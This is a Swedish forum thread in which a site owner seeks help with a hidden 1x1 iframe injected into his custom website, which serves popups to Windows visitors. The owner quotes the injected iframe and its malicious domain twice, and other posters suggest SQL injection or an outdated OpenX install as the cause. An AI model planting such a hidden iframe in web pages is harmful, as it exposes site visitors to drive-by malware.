Vacker djävlar...
 

Tja!
Jag har fått problem med ett irriterande intrång. Jag kan inte fatta hur det går till.

Jag får upp en alert som säger något i stil med:
The page at htttp://surveystop.com says:

Jag hittar inget i varken kod eller databas.

Nån som varit med om nåt liknande och kan ge lite support?

Svårt att säga något utan att veta vilken site det är.

Menar du på din dator eller på webbservern?

Det är på siten/servern

Det exekveras inte hela tiden, utan lite då och då och jag har personligen bara sett det en enda gång.

Hur får jag tag på det abergman?

Känner inte att jag vill diskuterad mer ingående här på forumet!

Du måste ju i alla fall ge mer information än så.

Är det en fil som laddats upp eller ändrats på din server?

Har du tillgång till accessloggar o. dyl.?

Kan tudligen inte bifoga en bild här på forumet....

hoppas att denna länk fungerar:
https://dl-web.dropbox.com/get/alert.jpg?w=860dabec

Men det kan jag endast hoppas, har aldrig skickat länkar till Dropbox på det här sättet tidigare.

Nu har jag gjort ett fynd, på en PC.
Äntligen fick jag se popupen med egna ögon.

När jag då samtigit granskar koden via visa källkod ser jag:
<iframe src="http://thisisratio.ka.hn/showthread.php?t=41710003" width="1" height="1" frameborder="0"></iframe>

Går jag till den exakta URL;en så får jag upp exakt samma popup som på de ställen jag nämner ovan i koden.

Jag kan inte se detta på min Mac, och det kommer som sagt var inte upp hela tiden, verkar som den loggar vilken sida, ip och nät som jag använt för att besöka sidan som först visar denna popup.

Någon som har en aning om hur fan man blir av med sånt här?

Jag kan inte se filen från dropbox. Därtill får du nog förklara lite bättre. Du har en egen server av något slag och dina besökare får popups?

Jag har egen server, Linux.

Problemet är att jag får upp en popup, när jag öppnar en angiven sida på webbplatsen.
Denna popup visas inte jämt, men när jag undersöker koden på sidan som visas (på min webbplasts) ser jag följande kod (som jag själv inte applicerat):
<iframe src="http://thisisratio.ka.hn/showthread.php?t=41710003" width="1" height="1" frameborder="0"></iframe>

Om man öppnar upp URL;en så öppnas precis den popup som jag blir irriterad över.

Någon som har erfarenhet av detta?

Gjorde en google på ovan resultat:
http://www.avgthreatlabs.com/sitereports/domain/ka.hn/

begripper inte resultatet direkt närmare, men hoppas på att någon här har lite insikt i vad det kan handla om.

hej igen!
ingen som varit med om ovan problem tidigare?

Någon här som kan tala om för mig vad ni behöver för att kunna hjälpa mig?

Du behöver vara avsevärt mycket tydligare, det du skrivit hjälper inte det minsta. Lite som att säga att din bil inte startar, varför?

*Har du något publiceringsverktyg? Joomla, wordpress etc?
*Har du kollat loggarna? Förslagsvis för både system och webbserver.
*Har du kollat filsystemet? Har filer ändrats? När och av vilken användare (www-data? din användare? root? en okänd användare?)

Ett mycket sannolikt scenario är att du har ett publiceringsverktyg och/eller en plugin som har ett känt hål. Avinstallera eller uppdatera, kolla datum på när filer ändrats och återställ dessa.

Att du inte ser popupen själv är ett vanligt sätt för cyberkriminella att göra en attack lite mer stealthy. Deras ändring syns bara för besökare som kommer från t.ex. google eller kanske bara för webbläsare som har en viss sårbarhet som de försöker utnyttja för att infektera besökaren.

*Har du något publiceringsverktyg? Joomla, wordpress etc?
Inget open source system, allt är skräddarsytt.

*Har du kollat loggarna? Förslagsvis för både system och webbserver.
Hittar inget konstigt där :(

*Har du kollat filsystemet? Har filer ändrats? När och av vilken användare (www-data? din användare? root? en okänd användare?)
Inga filer har ändrats, mer än själva publikationerna som laddas upp dagligen har ändrats, bara några fåtal korrigerar för att trimma upp det hela lite. Men inga ändragar gjorda av någon annan än mig, inga ändringar på datum etc.

Vad gäller det här med säkerhetshål, menar du att något fel i webbläsare eller pluginer/tillägg kan vara en källa till att skapa ett sådant här problem?

Något du själv har varit med om?

Ett tillägg, jag som Mac användare får själv inte upp detta problem, det är bara PC användare som får upp det. Vilket jag kan tycka tyder på något som användarna har råkat ut för, eller som bara körs på Windows datorer - kan jag ha fel?

Döma av att du fått in en iframe, så skulle jag gissa på att du har en sql injection möjlighet ngnstans i dina script. Alt. ngt av dina script tillåter _GET/_POST inkludering från URLn och sedan exkverar vad som ligger i variablen.

Att de bara drabbar PC användare och då troligen bara en specifik browser tyder på att din webbplats bara blivit ett avstamp för mkt allvarligare intrång längre ner på vägen.

Du kör kankse en dåligt uppdaterad OpenX-installation?

Råkade ut för samma problem som Expressen, Familjeliv mfl förut. Ej uppdaterad OpenX-installation hackades och hackarna la in en liten kodsnutt (iframe) som visades efter varje annons. Iframen poppade upp skumma sidor lite randomiserat.

Har Själv råkat ut för samma men en på en hemsida utan att jag besökte en video stream sida så fick jag en pop upp på varje google sökning det resulterade i att jag Fick ominstallera datorn i och med att det inte gick att ta bort pop up.

Om du kan hitta iframen i HTML-koden borde du väl kunna se vart den kommer ifrån?

Är det en fil som är på din server eller är det innehåll som genereras dynamiskt och hämtas ifrån databasen eller kaske till och med POST eller GET variabler.
När du lokaliserat vart det kommer ifrån borde du kunna ta bort det och täppa till säkerhetshålet

Finns det något sätt att via kod eller htaccess eller liknanda kunna blocka denna typ av script?

Ju längre tid som går ju mer desperat blir jag.

Detta är det problem som användarna rapporterar:
2011-10-03 08:05:03 - Module HTTP-filter - Threat Alert triggered on computer HQS-SEBASTIANE: http://www.eyemag.se/core/main.php?&...qpj4q6hhr4aqg2 contains HTML/Iframe.B.Gen virus.
2011-10-05 08:46:10 - Module HTTP-filter - Threat Alert triggered on computer HQB-JOSEPHINE: http://www.eyemag.se/core/main.php?&...a1hi8se8t0lnu1 contains HTML/Iframe.B.Gen virus.
2011-10-07 10:11:47 - Module HTTP-filter - Threat Alert triggered on computer SE17SKYLT1S: http://www.eyemag.se/core/main.php?&...i0p58u7akej3p7 contains HTML/Iframe.B.Gen virus.
2011-10-10 07:55:31 - Module HTTP-filter - Threat Alert triggered on computer HQS-SEBASTIANE: http://www.eyemag.se/core/main.php?&...pon519o61al3i5 contains HTML/Iframe.B.Gen virus.

Har någon sett något sådant här tidigare?